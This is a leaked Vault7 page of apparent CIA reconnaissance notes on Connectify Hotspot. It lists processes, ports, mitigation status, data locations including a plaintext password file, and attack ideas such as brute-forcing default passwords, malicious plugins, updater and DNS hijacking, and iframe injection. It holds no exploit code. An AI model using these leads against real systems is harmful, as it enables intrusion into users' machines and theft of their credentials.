Vault7: CIA Hacking Tools Revealed
Navigation: » Latest version
Owner: User #7995631
ConnectifyMe Research
SECRET//NOFORN
Connectify Hotspot Version: 2015.0.5.34877
Associated processes before creating a wireless network:
Process Name | DEP | ASLR | Ports | Notes |
---|---|---|---|---|
Connectify.exe | N |
TCP:2987 UDP connections come and go on different addresses |
||
Connectifyd.exe | Y | |||
ConnectifyService.exe | Y | |||
ConnectifyNetServices.exe | Showed up when starting a hotspot but then ends. |
Associated processes after creating a wireless network:
Process Name | DEP | ASLR | Ports | Notes |
---|---|---|---|---|
Connectify.exe | N |
TCP:2987 UDP connections come and go on different addresses |
||
Connectifyd.exe | Y | |||
ConnectifyService.exe | Y | |||
ConnectifyNetServices.exe |
TCP:53 (DNSDomain Name System) TCP:6789 (????) |
Showed up when starting a hotspot but then ends. |
Program data:
Settings are stored in C:\ProgramData\Connectify\
C:\ProgramData\Connectify\cache\natstats.sqlite has tables about clients connected including their mac address
Google-analytics: I'm not 100% sure what this is, but they seem to be giving google some information on usage. Maybe fisa collect on this?
DHCP logs in C:\programData\Connectify\logs\ConnectifyNetServices<Date yyyy-mm-dd>.log
Defensive features:
It logs the DNSDomain Name System server IP addresses at the start of the hotspot. This helps it detect DNSDomain Name System hijacks
Attack surface:
Wireless password:
default wireless password has a schema that would make a brute force attack pretty easy.
Can show the plaintext password, which means its stored in plaintext somewhere.
Plaintext password stored in C:\ProgramData\Connectify\settings\daemon
Program data (often programs treat their own config files and such as safe, but are they..)
Fuss the config files in C:\ProgramData\Connectify and see if we can crash it.
Plugins(Stored in C:\Program Files (x86)\Connectify\plugins\<Plugin Name>\<dll here>
It seems to load plugins, can we make one for it? if it loads us what data can we get access to.
Automatic updater(Calls out to updates.connectify.me)
How does this work?? Does the updater run something? If so, does it check if what it is running is signed?
If we hijack the DNSDomain Name System what can we do?
Does this make any web request, if so can we inject an I-Frame into it?
SECRET//NOFORN